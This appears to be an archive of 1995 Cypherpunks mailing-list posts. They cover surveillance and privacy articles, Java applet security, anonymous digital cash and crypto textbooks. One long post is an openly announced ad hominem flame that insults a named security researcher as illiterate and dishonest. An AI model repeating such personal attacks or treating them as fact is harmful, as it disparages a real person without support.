that can recognize faces by matching video images to
digitized photographs (from, say, drivers' licenses).

The British government, like many others, is also
discussing plans for a national identity card that would,
by giving everyone a number, make it easier to keep track
of personal data. The selling point is convenience. Much
of the work of filling out forms in bureaucratic Britain
is simply to give one branch of government information
that another part already has -- or to correct
information that bureaucrats have got wrong.

Convenient though it may be in theory, the combination of
national identity schemes and surveillance cameras
promises to give governments many of the powers of an
all-seeing God. And there are many reasons to worry that
mere humans would not be as merciful or as competent. Two
aspects of surveillance will prove crucial in determining
the practical terms of the new privacy bargain now being
struck: choice and reciprocity.

Unlike the subject of video surveillance, the wearer of
one of Olivetti's badges can remove the device and
disappear from the system. His electronic identity is
entirely a voluntary one: if he wishes to forward all the
telephone calls the old-fashioned way, by hand, there is
nothing to stop him. Surveillance becomes less intrusive
if it is optional. But choice cannot be a cure for all
the potential ills of surveillance. As electronic
personalization makes electronic identification more
important, that choice becomes harder to manage.

One problem is forgery. If electronic identities can be
taken on and off like sweaters, the risk that fraudsters
will be able to put on somebody else's identity rises.
Besides, as such identification becomes more important,
the sheer effort required to live anonymously will render
choice moot. Anonymity will simply become too much work.

Real village traditions offer hope for the lazy and the
identifiable. In village life, surveillance was
reciprocal: if Mrs. Grundy knew a lot about you, you also
knew a lot about her -- and you knew what she knew about
you. Technology should further extend this reciprocity.
The badges in the Olivetti lab provide a way of locating
any badge wearer. But they also allow badge wearers to
track anybody who is trying to locate them. There can
indeed be no personalization without identification, but
there is increasingly little excuse for identification
without notification. The same computers and networks
that send faces, names and numbers whizzing around the
world could also be required to send notification back to
each of those identified, each time they have been
spotted. Even as the world becomes more personalized and
less private, there is no reason for the electronic
global vilage to become less personable than a thatched
one, or less fair. 

Photo caption: Video cameras will scan the crowd at the
1996 Olympic Games in Atlanta. The security system can
transmit images for identification.

--John Browning

----------

The issue also has a brief report by Paul Wallich on
"Meta-Virus: Breaking the hardware species barrier,"
which reviews recently-publicized security flaws in the
Net, with quotes by William Cheswick of AT&T Bell Labs on
the issue and Hot Java.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 19 Oct 95 11:30:49 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Re: Postscript in Netscape
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <199510191830.OAA24317@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


AlephOne writes:
# I belive you have been told *SAVERAL* times you *WONT* get an answer
# on this list, and to contact their PR department. 

Dr. Frederick B. Cohen writes:
> So the PR department defines security at Netscape?

I expect that the PR department defines Netscape's official position on the 
definition of security at Netscape. Are you not interested in Netscape's
official position ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 19 Oct 95 14:39:30 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Postscript in Netscape
Message-ID: <9510192135.AA14888@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Please stop dinging Dr. Fred on the list, I know he's brought it on himself,
but it's painful to watch and pretty juvenile.  It's also bring the signal
to noise ratio on this list way down.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Oct 95 07:00:36 PDT
To: cypherpunks@toad.com
Subject: SciAm's Crypto Stego Pushup
Message-ID: <199510191400.PAA10237@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Scientific American, November, 1995

Doing Business on the Net

By Anne Eisenberg 


Like the leaves of autumn, those resolutely noncommercial
days on the Internet when ads were anathema are dwindling
fast. Nowadays the Internet's World Wide Web has so much
commercial promise that it has spun off an association
called the HTML Writers' Guild (http:
//www.mindspring.com). You can hire one of its members
literate in Hypertext Mark-up Language (HTML is the
language of the Web) to create dramatic "home pages,"
sites on the Web where a growing number of businesses
advertise their wares. "We're there for the same reason
we have banks in malls," one Citibank executive
explained. "It's where people congregate."

Web ads are quickly evolving into arresting combinations
of sound, text and vivid, point-and-click picture links
called image maps. Computer science students who were
once stern critics of business on the Net now eye the ads
appreciatively, so long as they are not "in your face" --
inserted where people have no choice but to look at them.
Besides, commercials may one day pay for Net services,
much as they now underwrite programs on radio and
television. And the ads are convenient: click on the
icon, read about the product and order, all in one step.

Many companies arc poised to put not only advertisements
but entire catalogues on the Web as routinely as they now
list their services in me Yellow Pages. After all, if
e-mail could hatch a generation of letter writers by
eliminating the bother of envelopes and stamps, surely
commerce should blossom when paper catalogues fall, and
we all start buying straight from the screen.

For business to thrive, though, people will need a secure
way to pay and be paid on the leaky Net, where messages
containing credit-card numbers can be intercepted as they
travel from machine to machine. And all those prospective
shoppers, entrepreneurs and micromerchants will want not
only secure payment mechanisms but also a choice -- cash,
check or charge -- before they hit the convenient,
brightly colored order links. Inspired by a vision of
untold millions buying and selling on the Net, companies
and banks (among them Chase Manhattan, Citibank,
CyberCash, DigiCash, Mondex and Microsoft) have joined
what is being called the Gold Rush of 1995, as they race
to become the Great Central Biller in the Sky.

No victors have yet emerged, but early leaders are
probably going to provide security in the form of
public-key, (PK) cryptography, ingenious algorithms that
use pairs of unique numerical "keys" for encoding and
decoding messages. If you use PK software for an online
shopping trip, you will have your own pair of keys, one
public and one as private as the identification number
you use to get cash from an automated teller machine.
When you order, your program will automatically encrypt
the information with your private key. When the company
uses your public key to decode the order, it will know
without question that the message was generated by you --
the match is the digital signature that authenticates the
transaction. Companies in turn will encrypt messages to
you with your public key; the messages will be secure,
for only you can decrypt and read them, using your
private key. Netscape and other new Web browsers --
software that lets you travel to linked Internet
resources without typing complicated addresses -- are
known as encrypting browsers; they are ready to help you
shop securely on the Net. Some will even come with
built-in PK signatures.

Whether the cryptographically cloaked digits of e-money
will bestow privacy in addition to security is another,
far more contentious matter. When people start using
e-wallets instead of cash to rent a video or lend a
friend $20, fertile new areas for infringing on privacy
will bloom. Electronic dossiers can be compiled by
automated systems that track spending habits. Many people
will not want the details of their daily lives collected
and stored in, say, consumer preference data banks,
joining the folders that already document their health
and credit ratings.

Only a few of the emerging electronic payment systems
address privacy issues. The untraceable digital cash
closest to hand is probably Chaumian cash, named in honor
of David Chaum, founder of DigiCash and of the
cryptographic protocols that underlie his anonymous
digital-money technology. Chaum's patented e-cash is an
adaptation of PK cryptography that includes one-way
privacy for the payer. The bank can verify that the money
is genuine but is blinded from identifying the source.
This means you will be able to prove you have made a
payment when you need to, but the bank cannot flick a
switch to retrieve the records of your travel and
entertainment preferences and add them to its data-mining
operations.

The terminology of electronic commerce reflects the clash
of cultures that has come about as the youthful language
of the Net meets the austere discourse of banking. The
jaunty "e-" prefix has attached itself firmly to Nettish
talk of the e-wallets and e-purses that we will soon be
using to make our e-payments. But bankers resist this
linguistic cheeriness. They substitute "digital" for
"electronic" whenever possible and never shorten it to
"d-" when they speak of the digital time stamps and
digital signatures they will soon offer us to
authenticate our digital payments. And cryptography
(known affectionately as crypto on the Net) is still a
four-syllable word at the bank, where it is against
nature for managers to be linguistically fond of any
action that commits them to untraceable communications
and exchanges.

We will know the new, hybrid field of electronic commerce
is truly on its way when banking ads on the Web offer
"strong crypto" and even, as a backup, steganography (the
science of hiding the existence of messages in, say,
microdots or sound files) for telephone chats with loan
officers. On the Net, of course, this service is already
known as stego.

-----

Anne Eisenberg (aeisenb@duke.poly.edu) conducts her
e-business at Polytechnic University in Brooklyn, N.Y.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 19 Oct 95 15:02:37 PDT
To: sami.shaio@eng.sun.com
Subject: Java power
Message-ID: <199510192201.PAA14221@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   At the recent cypherpunks meeting about Java, I was fairly
skeptical of its power, especially its ability to do anything useful
towards interesting cypherpunk projects. I've been thinking about it a
bit more, and I believe I was overly pessimistic.

   My thinking problem was that I was envisioning Java as a
replacement for ordinary HTTP server interaction (such as CGI
scripts). I still believe that, absent HTTP server interaction, Java
applets are quite limited. However, now that I've started thinking
about systems that are built using a combination of Java and servers,
the universe has expanded a lot.

   I'm still unclear about the exact security policy implemented by
Java browsers, but this is my understanding:

   * No access to local files at all.

   * Can only access URLs on same server as applet came from.

   Actually, I'm pretty sure the latter is an oversimplification, that
the applet can contact any socket as long as it is on the same IP host
as the applet itself. However, since HTTP can do pretty much anything
any other socket can, the only difference that makes is performance.

   Here's the "big insight" I had: the server can make up _both_ of
these deficiencies, by acting as a file server and communications
proxy. Essentially what this architecture does is shift the security
burden from the client to the server. In this way, the applet can
become "net complete," rather than merely Turing complete.

   I see one big drawback to this approach. Setting up a server like
this is pretty expensive, and using it takes up precious resources.
Not everyone has access to a fully scriptable server, which will limit
a lot of people.

   One concern is the "parasitic" use of file system resources on the
server. However, there may be a certain amount of security through
obscurity that makes this ok. If all Java browsers enforce the policy
of only allowing connections to the home host of the applet, then you
won't be getting connections from other, parasitic applets. The
remaining danger is rogue Java browsers, and non-Java applications
that talk to the server, pretending to be Java applets. Some form of
authentication could be used to reduce the impact of these attacks.

   I do see this kind of architecture used to supply services at, say,
an organizational level. For example, the "scheduling" scenario could
be implemented quite handily, including authentication of access to
the schedules, and even distributed scheduling if the different
servers are talking to each other.

   Another scenario which works is email, even including transparent
encryption. This one is interesting to me, so I'll go into a little
more detail.
   In this scenario, the server acts as a file server for keyrings
(both public and secret) and mail spools. Here's a typical sequence of
events for me getting my mail and replying to one message:

1. I call up the JavaMail web page, which is just a wrapper for the
JavaMail applet.

2. The JavaMail applet starts with a forms-style login screen. I type
my username.

3. The applet asks the server for my mail spool (given the username
and perhaps also a password for authentication).

4. The applet displays my mail spool on the screen and lets me fiddle
with it, scrolling through it, reading messages, etc.

5. Let's say one of those messages is encrypted with my public key.
The applet, recognizing that fact, queries the server for my secret
key, encrypted of course (with a symmetric cypher).

6. I type my password to the applet, which lets it decrypt the secret
key.

7. Now, that it has my secret key, the applet can RSA-decrypt the
encrypted mail and show it to me.

8. I want to reply to the message, so I hit 'r'. The applet gives me a
window for typing my reply. When I'm done, I click "send". The applet
queries the server for the recipient's public key.

9. When the applet gets the public key, it RSA-encrypts the message
and sends it to the server for delivery.

10. When the mail has been delivered, the server notifies the applet
of the fact.

   To me, this is an exciting scenario. Note that, as long as you
trust the browser, this lets you read your mail from anywhere.

   I have no idea whether this scheme is practical. One temporary
drawback is the speed of RSA operations. However, this will get fixed
when there is native code generation or a bignum library, whichever
comes first. Even before then, performance can still be good, using
two techniques. First, implement a cache of decrypted session keys
(also stored on the server in symmetrically encrypted form). Second,
don't display a new email message until it's been decrypted. That way,
the RSA operation affects only the latency of mail delivery, not the
bandwidth of reading through messages. Of course, these techniques
will also dramatically improve performance even for native code
crypto.

   I can see people setting up servers like this for themselves.
However, here's an idea on how to set these servers up "for profit."
In return for providing file system and mail communications services,
the server would expect clients to search keyspaces during idle
cycles. When Java goes native code, the computing power thus tapped
could be quite substantial.

   I'm interested to hear what people think about these proposals. Is
this something that cypherpunks should be doing full steam ahead?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallyn@cs.hope.edu (Kenshiro)
Date: Thu, 19 Oct 95 12:44:49 PDT
To: cypherpunks@toad.com
Subject: textbooks
Message-ID: <9510191944.AA09970@samwise.cs.hope.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 13:07:02 PDT
To: cypherpunks@toad.com
Subject: Re: SciAm Bye-Byes Privacy
Message-ID: <199510192003.QAA01607@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Scientific American, November, 1995
>
>Rights of Privacy
>
>Technology has its eyes on you
>
>But the search for personalization in a high-tech world
>may create an uncomfortable situation in the global
>village. Villages are safe places but not very private
>ones. Mrs. Grundy, peering from behind her lace curtains,
>did stop housebreakers. but she also tried to halt many
>other things of which she disapproved. There are signs
>that Grundyism is returning to Britain. 

For those who have neglected their education:

1798

Theater --- "Speed the Plough" by English playwright Thomas Morton, 34. "Be
quiet, wull ye [says farmer Ashfield]. Always ding, dinging Dame Grundy into
my ears-What will Mrs. Grundy say? What will Mrs. Grundy think?" 

DCF







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Thu, 19 Oct 95 13:07:42 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript and 50 ways [MAJOR NOISE] [long]
In-Reply-To: <9510191718.AA19952@all.net>
Message-ID: <m0t61If-0000oYC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Man oh man oh man...

	<Here> - <We> - <Go> - <A!Gain>...

	Rather than plague everyone with separate haranges for each of
numberous messages about two separate obnoxious nusanse threads going
on here - I've combined several messages together.  I think I have
kept the attributions straight.  I've tried to add attributions where
missing based on the "In-Reply-To:" headers.  If I screwed anything
up - sorry, I tried...

	It is long and contains history from another mailing list haunt.

	**************************************************
	* WARNING - Category 5 Ad Hominem Attack on Full *
	*	Afterburners dead ahead!		 *
	*						 *
	*	Hit delete NOW if not interest!		 *
	*						 *
	*	You have been warned!		 	 *
	**************************************************

	<FLAME><STRONG><FIRE IN DA HOLE!>

	To quote a line from one of the "Nightmare on Elm Street" slasher
flicks - "Freddie's Back!"

	There are several individuals on this list that I believe I
recognize from the firewalls list.  Those individuals are most likely
already familiar with most of what I'm about to relate.  Forgive me
with dredging up old news in a new forum.

	"Dr." Frederick B. Cohen was a frequent contributer to the
firewalls mailing list.  Many of his contributions were ill researched
and he often took great offense when anyone questioned one of his postings.
Out of the thousands of contributers I've read from literally dozens and
dozens of high volume lists I subscribe to, this is the only character I
know who puts a "Dr" in his address.  There are degrees floating all over
the place out here (even got a couple myself - so what?).  He appears
to be the only one who seems to need this annointed authority to
back his words.  He may not realize that to some of us, waving a
degree around like that, is a red letter warning to check everything
he's preaching and that he's probably more full of shit than a
christmas goose (his words tend to confirm that impression).

	He got into several disputes with some of the other lurkers
on the firewalls list, including the moderator, Brent Chapman.  Several
of us got into debates, some on line, some off line, as to whether he was:

	1) Really that ignorant and arrogant.
	2) Baiting people because that's how he got his jollies.
	3) Looking for any excuse to push his Info-Sec ad-signature.

	Many of us were of the opinion that it could have been a
combination of all three but #3 was the decided front runner.

	Whatever his degree - the phrase "educated above and beyond his
intellegence" comes to mind when I read one of his posts.  Ill informed,
opinionated, arrogant, and seemingly obsessed with his self worth are
other terms.

	He developed a reputation about pontificating about things which
he seemed to have little knowledge but to which he seemed to consider
himself an authority on.  He seem to have little interest in researching
a topic before shooting his mouth off, and seemed to feel that his "Dr."
conveyed some sort of infalibility on his opinions, turning opionion into
fact, so to speak.  To say he was less than graceful when someone would
foolishly point out some of his errors would be putting it mildly.

	His tirads prompted one lurker on the firewalls list to add
a line to his signature that went something like this: "Fine, so
you've got a PhD, just don't touch anything!"

	In one posting he recommended "cutting the wire to the record
head" on a floppy disk drive as a way to make it write protected.  This
was rather interesting in light of the fact that disk drives use combined
read/write heads and have no separate "record head".  Must have been
thinking it was a tape recorder.  His silly idea would have made
the drive both write protected and read protected as well.

	When I quoted his article and pointed it out as a source
of misinformation, he wrote me a message off-line wanting to know
why HIS information was included in my article about misinformation.
I had quoted most of his message, including his signature, in my
posting.  The information he quoted back to me was his "Info-Sec"
signature.  It seems his little tag line advertisements were more
important to him than the BULLSH*T he was thumping on about.
(Note point #3 above).

	In my reply, I asked him if the misinformation in the body
of the message was in fact his or was someone forging messages in
his name to discredit him.  He did admit it was his.  At this point,
I will give him credit - he was very gracious in that instance,
and admitted he had made a mistake.  It was a distinct contrast,
in private E-Mail, to his tone and manner on the public mailing lists.

In <199510182319.QAA02924@netcom23.netcom.com> cjs@netcom.com wrote:
> In <9510182213.AA05709@all.net> "Dr. Frederick B. Cohen" wrote:
	(^^^^ Attribution added - mine ^^^^)
> > 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or
> > other) browser:
> >
> > Concept 1 - Hot Java code that, once started, takes and retains
> > control of the viewer.  It includes hot buttons, etc.  that let you
> > use common resources on the net, store favorite places, etc.  When
> > you push any button in this window, it simulates Hot Java within its
> > own code, but all reads and writes contain code to restart the
> > program (such as the "remember favorite places" button, etc.).
> 
> You are obviously disillusioned/ignorant about how the java runtime
> enviroment works, and what is possable with with its base class
> libraries. I'll bet that you have never ever read the programming
> guide or the virtual machine specs, and I encourage you to do so
> before you embarass yourself even more.

	He doesn't seem to research his ideas before spouting them as
gosphel.  Once he has reached his "conclusion" he takes it as fact
and expects us to accept it because he's a "Dr".

	I read the original "50 ways" article.  I initially took it to
be dead serious.  Until I notice who the author was.  Then I thought
"it figures, validity = 0 -> drop in bit bucket".  I came away with the
impression that he was just spouting off, as is his way, and had not
only not tested one single idea espoused therein but really hadn't a
clue as to the validity of any of it.  I got the impression that he
expected us to accept his points on the weight of his degree alone,
since he provided no evidence, just random speculations.  I certainly
did not see any humor in the article as he later would allege.

> Christopher

> P.S. Coming Soon! 50 things that could happen to flying pigs!

	No joke.  No doubt he will claim that they should be secure pigs!

In <9510190047.AA14597@ communities.com> chip@communities.com (Chip Morningstar) wrote:
> fc@all.net (Dr. Frederick B. Cohen) writes:
> >50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> > ... (drivel elided)
> 
> This fellow seems to be systematically (if not deliberately) ignorant
> about these things.

	Keep that point in mind.  This may not be "accidental" ignorance here.

> One of my co-workers reviewed his book on computer viruses in IEEE
> Multimedia and noted that it manifests many of the same fallacies. You
> can read it (the review, not the book) at
> 
> http://www.communities.com/paper/itsalive.html
> 
	: Signature deleted :

	That would be very consistant with his writings on the firewalls
list.  I'll have to take a look at the review.  Should be good for a few
laughs at the very least!

In <199510190110.SAA02346@netcom23.netcom.com> cjs@netcom.com (cjs) wrote:
> fc@all.net (Dr. Frederick B. Cohen) wrote:
	(^^^^ Attribution added - mine ^^^^)
> > Boy, you people just don't appreciate anything that has a little bit of
> > humor mixed with a little bit of reality. 

	Got'm!  Now he claims it was humor.

> A little reality?? I've seen episodes of Star Trek with more reality.

	Agreed.

> Get real,

	Don't hold yer breath - that's not the gas he runs on.  :-)

> Christopher

In <199510191439.JAA05986@vespucci.iquest.com> pdlamb@iquest.com (Patrick Lamb) wrote:
> fc@all.net (Dr. Frederick B. Cohen) wrote:
>>> > The point I have been trying to make that many on this list seem to ignore
>>> > again and again, is that Netscape makes the security claims.  If you don't
>>> > provide effective protection, don't make the claim.  If you want to make
>>> > the claim back it up with something other than media hype.
>>> 
>>>   We are working on clarifying our security claims.  Here is an
>>> example from the San Jose Mercury news on Aug. 17, 1995:
>>> 
>>>     "We have said for a long time that given the right amount of
>>>     computer power, that a 40-bit key encrypted message could be
>>>     decrypted," said Mike Homer, Netscape's vice president of marketing. 
>>
>> "We" - I take it you are now speaking officially for Netscape?  So how come
>> Netscape doesn't even know how about Integrity shells and yet claims to
>> be able to design secure systems for money transfers?
>
><flame=on>
>
>Give it a rest, Doc.  You give all the rest of us Ph.D.'s a bad rep with
>this crap.  Of course, if you went to that 4-year vocational school to get
>an M.D., I guess that's understandable.

	Look beyond his statements.  The more this continues the more
excuse he has to post follow-ups, no matter how trivial.  Maybe his
motive is not to just drive home a point or rattle cages.

	But you are right - by waving his degree around like he does
he's confirming all the stereotypes of "college" people who haven't
got a clue or any connection with reality.  That makes ALL of us look
real bad and probably contributes to why some of us no longer think
that a degree is all that very important any longer.

>If you are so illiterate that you can't read the ascription (it says right
>up there, "said Mike Homer, Netscape's vice president of marketing"), then
>why do you (a) waste bandwidth and our time to go through this drivel, and
>(b) flame one Netscape employee for not knowing everything you know?  If
>there are all of 5+ refereed publications in this area, how about giving
>references?  It would take up less space than your recurring venom eruption!
>Or couldn't you understand the papers, given that you couldn't understand
>the news clip...

	He would seem to be both illiterate (educated - maybe; degreed
yes; literate - unlikely) and lacking in the ambition to research his
topics.  Maybe he's just so self assured in his inflability that he's
just naturally a cocky bastard.

	Maybe it's a PhD in religion.  That would fit.
	(Argh - sorry - cheap shot -
		appologies to any religious folk out there)

><flame=off>

In <9510191718.AA19952@all.net> Fredrick B. Cohen
> In <Pine.SUN.3.90.951019115251.17527B-100000@dfw.net> "Aleph One" wrote:
>> 
>> I belive you have been told *SAVERAL* times you *WONT* get an answer
>> on this list, and to contact their PR department. Why dont you do us all 
>> a favor. Contact the PR department if this questions really burns you so 
>> much. Get an answer. And post it on the list.
>
>So the PR department defines security at Netscape?
>
>-- 
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

	This is exactly the trivia that makes so many of us believe that
he's just in it for the shear numbers of posts he can crank out with his
Info-Sec ad-signature.  This shot carried nothing new or useful and
accomplished little except furthering his efforts to always get the last
word in and get another copy of his ad-signature out in front of everyone.

	Point - This signature is much smaller that the one he was
plaguing the firewalls list with.

	This finally got so bad on the firewalls list that Brent Chapman
ended up putting ole' Freddie on notice that he was on a short leash and
no more of his nonsense would be tolerated or reposted.  Brent exersized
the patience of a glacier while many of the rest of us were sick and
tired of this character.  Brent finally acted to maintain the list
in a state where the rest of us could get something productive from it.

	As is his way in trying to get the last word in, he shot off
a snippy remark to Brent to "test" the moderator filter.  Of course
Brent let that one through to illustrate the author's pettiness,
childishness, and immaturity.  Let it not be said that Brent does not
have a sense of humor, he let Freddie hang himself right pretty.

	</FIRE IN DA HOLE!></STRONG></FLAME>

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 19 Oct 95 15:20:06 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: digital cash and identity disclosure
In-Reply-To: <acac05c4410210047467@[205.199.118.202]>
Message-ID: <199510192219.QAA29534@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce <bryce@colorado.edu> wrote:
> 
>  (i.e., because the payer knows the actual ID number
> of the bill, she can choose to relate it to the bank and then the bank
> can identify who turns in that bill.  Has nothing to do with
> double-spending.  If the protocol provided for re-blinding before
> depositing the bill then this would not be possible, I think, and
> would still have nothing to do with double-spending.)


 Someone claiming to be the nym calling itself tcmay@got.net (Timothy C.
 May) wrote:
>
> Oh, but it does.

<snip>

> (Note: Any schemes for "re-blinding" must still allow "uniqueness"...and
> must still point back to Alice. Else the scheme/scam above 
[double-spending -B]
> will work.
> Online clearing, in which only the _first_ to present a digital cash claim
> gets paid, does not have this problem.)


Whoops, you're sure right.  Alice will not be revealing the bill's ID,
she will be revealing her "double-spending prevention" field.  Hm.  
I suppose that her victim (the one who received the pre-spent bill and
was "out"'ed) could have turned the bill in sans double-spending
prevention field if the protocol allowed for it and if he didn't mind
the risk of letting Alice get away with a bona fide double-spend.
 
 
Of course, if the bank allows anon accounts you can launder your e-coin
through these first.  Also, suppose I start a payee-anonymity service?
(a.k.a. e-laundering service).  You send me the e-coin you received, 
I deposit it with the bank, check out a new coin, and send you the new
coin.  (Minus my percentage.)  Of course, now *I* have the ability to
sting you...


Regrettably, Tim C. May is right and current Chaumian Ecash can't do
off-line clearing without enabling stings in which payers can prove
which bank account the payee used to deposit the coin.  (Not quite the
same as proving the payee's identity, but...)  Marcel van der Peijl of
DigiCash once bragged to me in private e-mail that they could probably
do both-way anonymity in off-line clearing if they really wanted to.
Does anyone else think that this is possible?  Unlike Tim, I think
that off-line clearing capability is a big plus.


Regards,

Bryce

Announcement:  I'm not reading cpunks very much.  Cc: me if you want
to be sure I'll read your post.


signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIbKx/WZSllhfG25AQEsFAQApkyEFvVhNAdUdOMBAXkFAq1ICKtw+J4Z
8rTJmkkjc2bCdl8Rh1K7jWQESxSFIrF5bLfAyJz/K2CXhVSCOZpRASSFH7vL9HHb
7M9Gv7ZfvJ5vqEvW/PpLlDoA5xjt3Q4Q3xMW1dsqOyW928kkXzZhqqKDhGlTFNoW
+sMTuvi8X7c=
=QLx5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 19 Oct 95 13:29:01 PDT
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
Message-ID: <199510192028.QAA05488@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:02 PM 10/19/95 -0400, Thomas Grant Edwards wrote:

>Q:  Will they allow CU-SeeMe in the courtroom?  (over Metricom radio modem?)
>
>-Thomas
>

No cameras allowed in federal courtrooms.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 19 Oct 95 13:34:27 PDT
To: hallyn@cs.hope.edu (Kenshiro)
Subject: Re: textbooks
In-Reply-To: <9510191944.AA09970@samwise.cs.hope.edu>
Message-ID: <199510192034.QAA11816@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Kenshiro writes:
> I am planning to do take an independent study course in cryptography.  A
> professor here is interested in doing it with me, but neither he nor any
> other faculty members at this school is very knowledgeable about
> cryptography (hence his interest :).  I am looking for good (technical)
> books on cryptography which would work well as textbooks for undergraduate
> computer science majors with scant knowledge of number theory.

The right place to start is the new edition of Bruce Schneier's book,
Applied Cryptography, which will be coming out within a month. The old
edition will probably do until then. There are a number of other
books, but Bruce's is the One Stop Shopping center, and you can spend
years dredging up the things in the bibliography.

For flavor and motivation, you might also want to read the (unabridged
hardcover -- not paperback!) version of "The Codebreakers" by David
Kahn. I read this book as a child and I suppose it got me interested
in crypto for life -- the funny thing is, it appears that the same
experience inspired Whit Diffie to go off and co invent Public Key
Cryptography, so it is probably a history maker. However, I'll note
that its fluffy -- all it will do is give you a solid perspective on
how hard it is to do this stuff right and how important it is.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Thu, 19 Oct 95 16:20:17 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult [NOISE]
Message-ID: <v02130500acac6b830172@[204.131.233.7]>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
>John Young wrote:
>>
>> Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne")
>> on Sun, 15 Oct 12:0  AM
>>
>> The PR of Bugs Bounty is the aim, as the quick-market-adapter
>> Netscape Chair speechified in FR.
>>
>> Promoting the notion that hackers are earnestly attacking
>> Netscape and reporting its bugs increases its credibility to
>> the stock market porkers. Is that not why dear
>> all-too-attentive Jeff has been assigned duty on this list,
>> feeding peanuts to chimp hackers and champ newshacks?
>
>  I have not been "assigned duty" on this list.  I'm here of my
>own free will.  I want to keep up on whats going on in the
>cypherpunk world, and sometimes tap the expertise of the list.
>I'm not some corporate flack assigned here to "feed the chimps".
>My personal feelings definitely lean toward unimpeded strong
>crypto, personal privacy, freedom from govt. surveilence, etc.,
>and I was interested in this stuff at a personal level before
>joining netscape, or working on security stuff.
>
>        --Jeff

So a reviewer stepped in and accused the rock star of  having "sold out"...
Does working as a programmer for a "major label" on a top-40 hit mean
you're not true to your artistic roots any more?

Or does "working within the system" permanently disqualify you from
rebel/outcast status?

OK, sorry, enough of the cliches. :-)


Richard






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Thu, 19 Oct 95 14:46:41 PDT
To: cypherpunks@toad.com
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
Message-ID: <9510192146.AA00991@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
From die Thu Oct 19 17:44:12 1995
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash (fwd)
To: loofbour@cis.ohio-state.edu (Nathan Loofbourrow)
Date: Thu, 19 Oct 1995 17:44:12 -0400 (EDT)
From: "Dave Emery" <die@pig.die.com>
Reply-To: die@die.com
In-Reply-To: <199510191346.JAA10841@colon.cis.ohio-state.edu> from "Nathan Loofbourrow" at Oct 19, 95 09:46:23 am
X-Mailer: ELM [version 2.4 PL24alpha3]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 2547      


> 
> I seem to remember PROMs actually undergoing physical, rather than
> electrical, state changes (that were presumably nonreversible). Am I
> recalling old technology, or am I just plain mistaken?

	There are three technologies here (as I am sure you know),
